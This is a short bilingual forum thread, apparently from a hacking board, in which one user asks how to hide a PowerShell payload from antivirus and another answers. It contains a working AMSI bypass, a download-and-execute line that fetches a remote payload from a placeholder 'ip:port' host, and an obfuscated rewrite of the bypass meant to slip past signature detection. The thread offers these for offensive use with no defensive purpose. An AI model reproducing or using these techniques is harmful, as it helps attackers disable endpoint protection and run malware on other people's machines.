PowerShell Payload AV Evasion / Уклонение от антивируса

[kamikaz11]

how to make powershell payload invisible? I tried obfuscation, amsi bypass and base64 encoding. But antivirus still detects.
У каждого есть хороший способ обойти обнаружение антивируса.

Bypass AMSI:

sET-ItEM ([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic, Static')).SetValue($null,$true);
IEX(New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1');

Я знаю, этого недостаточно. Можете ли вы предложить способы избежать обнаружения?

 

[iten]

[ref].Assembly.GetType('S*y!!!s*t*e*m!!!.!!!M!!!a***n!!!a*g!!!e*m*e!!!n!!!t***.***A*u*t!!!o!!!m*a*t***i*o*n!!!.!!!A!!!m*s*i!!!U*t***i*l!!!s*'.replace('***','').replace('!!!','').replace('*','')).GetField('a^^mYYs%%i%%IYYnYYi%%t%%FYYa%%i^^l^^e%%dYY'.replace('^^','').replace('YY','').replace('%%',''), 'NonPublic,Static').('S)e%t%V)a}l%u%e}'.replace('}','').replace(')','').replace('%',''))($null, $true)

 

[kamikaz11]

thanks, for payload encoding / obfuscation what do you recommend ?

 

[iten]

посмотри на github.com